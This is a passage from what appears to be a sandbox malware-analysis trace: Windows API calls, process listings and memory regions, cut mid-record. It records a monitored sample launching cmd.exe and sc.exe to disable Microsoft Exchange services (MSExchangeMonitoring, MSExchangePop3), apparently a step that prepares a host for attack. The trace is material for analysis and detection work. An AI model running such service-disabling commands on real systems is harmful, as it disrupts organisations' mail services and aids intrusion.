(_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.693] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.694] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeMonitoring start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x48ff040*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeMonitoring start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x48ff08c | out: lpCommandLine="sc config MSExchangeMonitoring start= disabled", lpProcessInformation=0x48ff08c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x9ec, dwThreadId=0xff4)) returned 1 [0131.700] CloseHandle (hObject=0xa4) returned 1 [0131.700] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.700] GetEnvironmentStringsW () returned 0x4989f10* [0131.700] FreeEnvironmentStringsA (penv="=") returned 1 [0131.700] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0131.826] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x48ff024 | out: lpExitCode=0x48ff024*=0x424) returned 1 [0131.826] CloseHandle (hObject=0xa8) returned 1 [0131.826] _vsnwprintf (in: _Buffer=0x48ff10c, _BufferCount=0x13, _Format="%08X", _ArgList=0x48ff02c | out: _Buffer="00000424") returned 8 [0131.826] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0131.826] GetEnvironmentStringsW () returned 0x498b3b0* [0131.826] FreeEnvironmentStringsA (penv="=") returned 1 [0131.826] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.826] GetEnvironmentStringsW () returned 0x498b3b0* [0131.826] FreeEnvironmentStringsA (penv="=") returned 1 [0131.826] DeleteProcThreadAttributeList (in: lpAttributeList=0x48ff0b8 | out: lpAttributeList=0x48ff0b8) [0131.826] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.826] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0131.826] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.826] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0131.826] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.827] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0131.827] SetConsoleInputExeNameW () returned 0x1 [0131.827] GetConsoleOutputCP () returned 0x1b5 [0131.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.827] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.827] exit (_Code=1060) Thread: id = 499 os_tid = 0xc18 Process: id = "147" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x272c3000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "146" os_parent_pid = "0xfc4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7932 start_va = 0x7fa2f000 end_va = 0x7fa2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fa2f000" filename = "" Region: id = 7933 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7934 start_va = 0x476270000 end_va = 0x47628ffff entry_point = 0x0 region_type = private name = "private_0x0000000476270000" filename = "" Region: id = 7935 start_va = 0x476290000 end_va = 0x4762a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000476290000" filename = "" Region: id = 7936 start_va = 0x4762b0000 end_va = 0x4762effff entry_point = 0x0 region_type = private name = "private_0x00000004762b0000" filename = "" Region: id = 7937 start_va = 0x7df5ff190000 end_va = 0x7ff5ff18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff190000" filename = "" Region: id = 7938 start_va = 0x7ff6c3af0000 end_va = 0x7ff6c3b12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3af0000" filename = "" Region: id = 7939 start_va = 0x7ff6c3b1d000 end_va = 0x7ff6c3b1efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b1d000" filename = "" Region: id = 7940 start_va = 0x7ff6c3b1f000 end_va = 0x7ff6c3b1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b1f000" filename = "" Region: id = 7941 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7942 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7943 start_va = 0x476270000 end_va = 0x47627ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000476270000" filename = "" Region: id = 7944 start_va = 0x476280000 end_va = 0x476286fff entry_point = 0x0 region_type = private name = "private_0x0000000476280000" filename = "" Region: id = 7945 start_va = 0x4762f0000 end_va = 0x4763adfff entry_point = 0x4762f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7946 start_va = 0x4763b0000 end_va = 0x4763effff entry_point = 0x0 region_type = private name = "private_0x00000004763b0000" filename = "" Region: id = 7947 start_va = 0x4763f0000 end_va = 0x4763f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004763f0000" filename = "" Region: id = 7948 start_va = 0x476400000 end_va = 0x476406fff entry_point = 0x0 region_type = private name = "private_0x0000000476400000" filename = "" Region: id = 7949 start_va = 0x476410000 end_va = 0x476410fff entry_point = 0x0 region_type = private name = "private_0x0000000476410000" filename = "" Region: id = 7950 start_va = 0x476420000 end_va = 0x476420fff entry_point = 0x0 region_type = private name = "private_0x0000000476420000" filename = "" Region: id = 7951 start_va = 0x476470000 end_va = 0x47647ffff entry_point = 0x0 region_type = private name = "private_0x0000000476470000" filename = "" Region: id = 7952 start_va = 0x4764c0000 end_va = 0x4765bffff entry_point = 0x0 region_type = private name = "private_0x00000004764c0000" filename = "" Region: id = 7953 start_va = 0x4765c0000 end_va = 0x476747fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004765c0000" filename = "" Region: id = 7954 start_va = 0x476750000 end_va = 0x4768d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000476750000" filename = "" Region: id = 7955 start_va = 0x4768e0000 end_va = 0x477cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004768e0000" filename = "" Region: id = 7956 start_va = 0x7ff6c39f0000 end_va = 0x7ff6c3aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c39f0000" filename = "" Region: id = 7957 start_va = 0x7ff6c3b1b000 end_va = 0x7ff6c3b1cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b1b000" filename = "" Region: id = 7958 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7959 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7960 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7961 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7962 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7963 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7964 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7965 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7966 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7967 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7968 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7969 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7970 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7971 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 496 os_tid = 0x9cc Thread: id = 497 os_tid = 0x778 Thread: id = 498 os_tid = 0xf0 Process: id = "148" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x66ffc000" os_pid = "0x9ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "146" os_parent_pid = "0xfc4" cmd_line = "sc config MSExchangeMonitoring start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7985 start_va = 0xc10000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 7986 start_va = 0xc30000 end_va = 0xc31fff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 7987 start_va = 0xc40000 end_va = 0xc53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 7988 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 7989 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 7990 start_va = 0xce0000 end_va = 0xce3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 7991 start_va = 0xcf0000 end_va = 0xcf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cf0000" filename = "" Region: id = 7992 start_va = 0xd00000 end_va = 0xd01fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 7993 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7994 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7995 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7996 start_va = 0x7f250000 end_va = 0x7f272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f250000" filename = "" Region: id = 7997 start_va = 0x7f275000 end_va = 0x7f275fff entry_point = 0x0 region_type = private name = "private_0x000000007f275000" filename = "" Region: id = 7998 start_va = 0x7f27c000 end_va = 0x7f27efff entry_point = 0x0 region_type = private name = "private_0x000000007f27c000" filename = "" Region: id = 7999 start_va = 0x7f27f000 end_va = 0x7f27ffff entry_point = 0x0 region_type = private name = "private_0x000000007f27f000" filename = "" Region: id = 8000 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8001 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8002 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8003 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8004 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8005 start_va = 0x5010000 end_va = 0x501ffff entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 8006 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8007 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8008 start_va = 0x5150000 end_va = 0x524ffff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 8009 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8010 start_va = 0xc10000 end_va = 0xc1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 8011 start_va = 0xc20000 end_va = 0xc23fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 8012 start_va = 0xd10000 end_va = 0xdcdfff entry_point = 0xd10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8013 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 8014 start_va = 0xe10000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 8015 start_va = 0x4f60000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 8016 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8017 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8018 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8019 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8020 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8021 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8022 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8023 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8024 start_va = 0x7f150000 end_va = 0x7f24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f150000" filename = "" Region: id = 8025 start_va = 0x7f279000 end_va = 0x7f27bfff entry_point = 0x0 region_type = private name = "private_0x000000007f279000" filename = "" Region: id = 8026 start_va = 0x5020000 end_va = 0x50fefff entry_point = 0x5020000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8027 start_va = 0xe50000 end_va = 0xe61fff entry_point = 0xe50000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 500 os_tid = 0xff4 [0131.735] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0131.735] __set_app_type (_Type=0x1) [0131.735] __p__fmode () returned 0x77ac4d6c [0131.735] __p__commode () returned 0x77ac5b1c [0131.735] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0131.735] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0131.735] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.817] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.817] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0131.817] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0131.817] _wcsicmp (_String1="config", _String2="query") returned -14 [0131.817] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0131.817] _wcsicmp (_String1="config", _String2="start") returned -16 [0131.817] _wcsicmp (_String1="config", _String2="pause") returned -13 [0131.817] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0131.817] _wcsicmp (_String1="config", _String2="control") returned -14 [0131.817] _wcsicmp (_String1="config", _String2="continue") returned -14 [0131.817] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.817] _wcsicmp (_String1="config", _String2="config") returned 0 [0131.817] ResolveDelayLoadedAPI () returned 0x77262c10 [0131.817] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5158558 [0131.819] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0131.819] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0131.819] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0131.819] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0131.819] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0131.819] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0131.819] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0131.819] OpenServiceW (hSCManager=0x5158558, lpServiceName="MSExchangeMonitoring", dwDesiredAccess=0x3) returned 0x0 [0131.819] GetLastError () returned 0x424 [0131.819] _ultow (in: _Dest=0x424, _Radix=13498832 | out: _Dest=0x424) returned="1060" [0131.819] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0131.821] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xcdf9ac, nSize=0x2, Arguments=0xcdf9c4 | out: lpBuffer="裨ԕ溺Í蔔è") returned 0x62 [0131.821] GetFileType (hFile=0x3c) returned 0x2 [0131.821] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf990 | out: lpMode=0xcdf990) returned 1 [0131.821] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x51588e8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xcdf9a0, lpReserved=0x0 | out: lpBuffer=0x51588e8*, lpNumberOfCharsWritten=0xcdf9a0*=0x62) returned 1 [0131.822] LocalFree (hMem=0x51588e8) returned 0x0 [0131.822] LocalFree (hMem=0x0) returned 0x0 [0131.822] CloseServiceHandle (hSCObject=0x5158558) returned 1 [0131.822] LocalFree (hMem=0x0) returned 0x0 [0131.822] exit (_Code=1060) Thread: id = 501 os_tid = 0x604 Process: id = "149" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x670ea000" os_pid = "0xff0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangePop3 start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8028 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8029 start_va = 0x850000 end_va = 0x484ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 8030 start_va = 0x4850000 end_va = 0x486ffff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 8031 start_va = 0x4870000 end_va = 0x4870fff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 8032 start_va = 0x4880000 end_va = 0x4893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004880000" filename = "" Region: id = 8033 start_va = 0x48a0000 end_va = 0x48dffff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 8034 start_va = 0x48e0000 end_va = 0x49dffff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 8035 start_va = 0x49e0000 end_va = 0x49e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049e0000" filename = "" Region: id = 8036 start_va = 0x49f0000 end_va = 0x49f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 8037 start_va = 0x4a00000 end_va = 0x4a01fff entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 8038 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8039 start_va = 0x7ef40000 end_va = 0x7ef62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef40000" filename = 